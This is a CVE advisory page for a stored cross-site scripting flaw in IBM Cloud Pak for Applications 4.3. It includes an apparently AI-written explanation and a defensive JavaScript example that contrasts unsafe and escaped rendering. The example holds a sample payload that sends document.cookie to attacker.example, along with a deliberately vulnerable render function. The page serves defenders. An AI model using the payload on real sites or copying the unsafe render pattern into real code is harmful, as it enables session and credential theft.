VYPR
Unrated severity · NVD Advisory · Published Jul 13, 2021 · Updated Sep 16, 2024

CVE-2021-20365


Description

IBM Cloud Pak for Applications 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 195036.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

IBM Cloud Pak for Applications 4.3 is vulnerable to cross-site scripting: an authenticated user can embed arbitrary JavaScript in the Web UI, and the script runs in other users' sessions, potentially disclosing their credentials.

Vulnerability

IBM Cloud Pak for Applications 4.3 is vulnerable to cross-site scripting (XSS): user-supplied input is rendered in the Web UI without adequate neutralization, so a user can embed arbitrary JavaScript that executes in other users' browsers and alters the intended functionality of the UI [1]. The CVE description names version 4.3 only; it does not state that other versions are affected, so the exact affected builds should be taken from the IBM advisory rather than inferred.

Exploitation

An attacker holding a low-privileged account (PR:L) plants a script payload in Web UI content that another user later views; execution requires that victim's interaction (UI:R). The CVSS vector (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) is reachable over the network with low attack complexity and records a changed scope (S:C): the script runs in the victim's browser, outside the component that failed to neutralize the input [1]. The description does not identify which Web UI field or parameter carries the injection.

Impact

Successful exploitation runs attacker-controlled JavaScript inside the victim's authenticated session. From there the script can read whatever the page exposes (session tokens, form contents, credentials shown in the UI) and issue requests as the victim, which is the "credentials disclosure within a trusted session" the description refers to. CVSS rates confidentiality and integrity impact as low (C:L/I:L) with no availability impact (A:N), reflecting a compromise confined to the victim's browser session [1].

Mitigation

The remediation cited in [1] is to upgrade to IBM Cloud Pak for Applications 4.3.1; no workaround is listed. This page's own patch index currently records no patch entry, so confirm the fix level against the IBM security bulletin before relying on it. The generic hardening for this bug class is output encoding matched to the HTML context in which user input is rendered, backed by a Content-Security-Policy that disallows inline script. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
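The rendering flaw described in the Vulnerability and Exploitation sections and the output-encoding fix mentioned under Mitigation, as an added example that is not IBM's code and is not taken from the advisory: a vulnerable render path that concatenates a user-controlled field straight into markup, the same path with HTML escaping applied at the interpolation point, and a scheme check for user-supplied links (escaping alone does not neutralize a `javascript:` URL). The payload, the profile field, the base URL and all helper names are constructed for illustration; the code runs in Node without a browser by treating the page as a string.

```javascript
// Added example, not IBM's code: the stored-XSS pattern behind bugs like
// CVE-2021-20365 and its fix, reduced to string rendering so it runs in
// Node without a browser. PAYLOAD, the field name and helpers are constructed.

// Constructed value a low-privileged user might save into a profile field.
// If rendered raw, it ships the viewer's cookies to an attacker-chosen host.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable path: user-controlled text is concatenated straight into markup.
function renderUnsafe(displayName) {
  return `<li class="user">${displayName}</li>`;
}

// Escape the characters that change meaning in HTML text and in
// double- or single-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened path: every interpolation into markup goes through the escaper.
function renderSafe(displayName) {
  return `<li class="user">${escapeHtml(displayName)}</li>`;
}

// Links need scheme validation on top of escaping: an escaped
// href="javascript:alert(1)" still executes on click. Anything that is not
// http(s) is replaced with a harmless fragment. The base URL is constructed.
function safeHref(url) {
  let parsed;
  try {
    parsed = new URL(url, 'https://app.example/');
  } catch {
    return '#';
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:'
    ? escapeHtml(parsed.href)
    : '#';
}

// Crude tester's check over rendered output: does a tag from the payload
// survive as real markup (i.e. '<img' rather than '&lt;img')?
function containsLiveTag(html, tagName) {
  return new RegExp(`<${tagName}\\b`, 'i').test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe :', renderUnsafe(PAYLOAD));
  console.log('safe   :', renderSafe(PAYLOAD));
  console.log('link   :', safeHref('javascript:alert(document.cookie)'));
}
```

The escaper is the fix for the text and quoted-attribute contexts; for other contexts (unquoted attributes, inline event handlers, `<script>` bodies, CSS) the encoding rules differ, which is why frameworks route all interpolation through a context-aware templating layer rather than a single replace. The `safeHref` check is the part most often forgotten when a UI lets users supply links.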

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 2

News mentions: 0 (no linked articles in our index yet)